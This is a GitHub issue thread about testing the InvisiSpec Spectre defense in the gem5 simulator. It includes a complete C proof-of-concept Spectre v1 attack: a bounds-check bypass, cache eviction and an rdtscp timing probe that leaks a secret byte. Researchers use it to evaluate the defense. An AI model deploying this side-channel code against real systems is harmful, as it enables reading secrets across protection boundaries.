Comments (11)
I'd like to see what changes the InvisiSpec code has made to gem5, but this repo doesn't have the history of what modifications have been made, so I tried to rebase the code onto a gem5 revision. It's a big change with nearly 3k lines of modifications.
https://git.wehack.space/gem5/commit/?h=invisispec-1.0&id=169588684b179baed4f5f93d8be52c51aa08f06d
I found the code has added the rdtscp in src/arch/x86/isa/insts/system/msrs.py and src/arch/x86/isa/macroop.isa.
from invisispec-1.0.
I've just written PoC code which evicts everything in the cache, then uses Spectre to read the secret value in the cache. I also rebased the code onto a gem5 revision which has an rdtscp implementation. (https://git.wehack.space/gem5/log/?h=is-rebase-new3-rdtscp) My attack code is as follows:
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>

/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
#define LLC_SIZE (2 << 20)

uint8_t dummy[LLC_SIZE];
size_t array_size = 4;
uint8_t array1[200] = {1, 2, 3, 4};
uint8_t array2[256 * 64 * 2];
uint8_t X;

uint8_t victim(size_t idx)
{
    if (idx < array_size) {
        return array2[array1[idx] * 64];
    }
    return 0; /* out-of-bounds index: defined return value */
}

int main()
{
    unsigned long t[256];
    volatile uint8_t x = 0;

    /* in-bounds calls before the out-of-bounds one */
    victim(0);
    victim(0);
    victim(0);
    victim(0);
    victim(0);

    memset(dummy, 1, sizeof(dummy)); // flush L2
    X = 123; // set the secret value, and also bring it to cache
    _mm_mfence();

    /* distance from array1 to X, used as the out-of-bounds index */
    size_t attack_idx = &X - array1;
    victim(attack_idx);

    /* time one access to each array2 line */
    for (int i = 0; i < 256; i++) {
        unsigned int junk;
        unsigned long time1 = __rdtscp(&junk);
        x ^= array2[i * 64];
        unsigned long time2 = __rdtscp(&junk);
        t[i] = time2 - time1;
    }

    printf("attack_idx = %zu\n", attack_idx);
    for (int i = 0; i < 256; i++) {
        printf("%d: %lu, %s\n", i, t[i], (t[i] < 40) ? "hit" : "miss");
    }
    return 0;
}
When running

    ./build/X86_MESI_Two_Level/gem5.fast configs/example/se.py --num-cpus=1 --mem-size=4GB --cpu-type=DerivO3CPU --needsTSO=1 --scheme=UnsafeBaseline --ruby -c attack

I can see

    123: 30, hit

and others miss, while changing UnsafeBaseline to SpectreSafeInvisibleSpec, all the lines miss.
from invisispec-1.0.
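The comparison reported in the comment above (one line under the 40-cycle cutoff with UnsafeBaseline, none with SpectreSafeInvisibleSpec) can be checked mechanically when evaluating a scheme. The following is an added example, not part of the original post or the InvisiSpec repository; `leaked_index` and both sample outputs are hypothetical, and only the `123: 30, hit` line comes from the thread.

```c
#include <stdio.h>
#include <string.h>

#define HIT_THRESHOLD 40UL  /* cycles; the cutoff the PoC prints with */

/* Constructed sample output. Only the "123: 30, hit" line is taken from
 * the thread; attack_idx and the miss latencies are made up. */
static const char BASELINE_RUN[] =
    "attack_idx = 4242\n122: 187, miss\n123: 30, hit\n124: 191, miss\n";
static const char INVISISPEC_RUN[] =
    "attack_idx = 4242\n122: 187, miss\n123: 189, miss\n124: 191, miss\n";

/* Scan PoC output for "<index>: <cycles>, hit|miss" lines and judge each
 * by its latency, not by the printed label. Returns the one index under
 * the threshold, -1 if none was, -2 if several were (noisy run). */
int leaked_index(const char *out)
{
    int found = -1;
    while (*out) {
        size_t len = strcspn(out, "\n");
        char line[64], label[8];
        int idx;
        unsigned long cycles;
        if (len < sizeof line) {
            memcpy(line, out, len);
            line[len] = '\0';
            /* Banner and "attack_idx = ..." lines fail this match. */
            if (sscanf(line, "%d: %lu, %7s", &idx, &cycles, label) == 3 &&
                (!strcmp(label, "hit") || !strcmp(label, "miss")) &&
                idx >= 0 && idx < 256 && cycles < HIT_THRESHOLD) {
                if (found >= 0 && found != idx)
                    return -2;
                found = idx;
            }
        }
        out += len;
        if (*out == '\n')
            out++;
    }
    return found;
}

int main(void)
{
    printf("UnsafeBaseline: %d\n", leaked_index(BASELINE_RUN));
    printf("SpectreSafeInvisibleSpec: %d\n", leaked_index(INVISISPEC_RUN));
    return 0;
}
```

A result of -2 means more than one line came in under the cutoff, so the run is too noisy to attribute to a single value and the measurement should be repeated.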
The version of GEM5 that we started with does not have good support for serializing "rdtscp" instructions, resulting in incorrect measurement of execution time. After hacking the simulator, we made the attack work, but it is required to use 2 "rdtscp" instructions, where the first one works as a "fence" and the second one works as the real "rdtsc" instruction.
We just uploaded the attack code. Please find it under the directory "attack_code".
Also, InvisiSpec requires modifying the cache, and we only did it for MESI_Two_Level.
from invisispec-1.0.
Thank you so much for your response.
Using --caches with --scheme=SpectreSafeInvisibleSpec , gives the below error:
gem5.opt: build/X86_MESI_Two_Level/mem/cache/cache.cc:192: void Cache::satisfyRequest(PacketPtr, CacheBlk*, bool, bool): Assertion `pkt->hasRespData()' failed.
Program aborted at tick 844000
So, I had to use --ruby (the example scripts use ruby too). I ran the below command:
build/X86_MESI_Two_Level/gem5.opt --outdir=m5out configs/example/se.py --cpu-type=DerivO3CPU --needsTSO=0 --scheme=UnsafeBaseline --ruby --l1d_assoc=8 --l2_assoc=16 --l1i_assoc=4 -c spectre_full.
Spectre attack is not working with the above command, where spectre_full is the binary.
for the attack code provided by you.
However, Spectre attack works when I run:
build/X86_MESI_Two_Level/gem5.opt configs/learning_gem5/part1/two_level.py spectre_full
two_level.py creates standard caches instead of ruby simulated caches.
So, could you please let me know how you ran the attack using --ruby? Could you please share the command/script used to run spectre, if possible?
I have tried tweaking various config options as well as CACHE_HIT_THRESHOLD to run the attack with ruby, but without any success. Also, I have tried using most of the config options in run_spec_from_ckpt.sh without success.
from invisispec-1.0.
For the first problem, the InvisiSpec mode only works under ruby mode. It is because we added new transactions, such as the invisible request, validation, exposure (details in the InvisiSpec paper). We only modified the ruby mode to handle these requests. This is why the classical cache mode does not work.
For the second problem, it is weird that the spectre code does not work. We are looking into it, and hopefully can get back to you soon.
from invisispec-1.0.
Thanks for the quick reply.
Would significant changes to the existing code be required to get InvisiSpec mode to work in standard cache mode?
from invisispec-1.0.
I think it requires some changes. Basically, you need to add support to handle these new requests.
from invisispec-1.0.
Could you please confirm this for me:
You ran the attack with scheme as UnsafeBaseline in cache mode and showed your defense against attack with scheme as SpectreSafeInvisibleSpec in Ruby mode. Am I missing something here?
from invisispec-1.0.
Request you to add the branch you used to test the attack code.
from invisispec-1.0.
@mytbk Why is the delay of 20 when I use the above code? Can you run the spectre attack under the option of UnsafeBaseline? This code is a modification of the base mountain on InvisiSpec, but it can run a spectre attack in the case of UnsafeBaseline. https://github.com/gururaj-s/cleanupspec . In this code, clflush and rdtscp seem to work. But there is an error under other options.
from invisispec-1.0.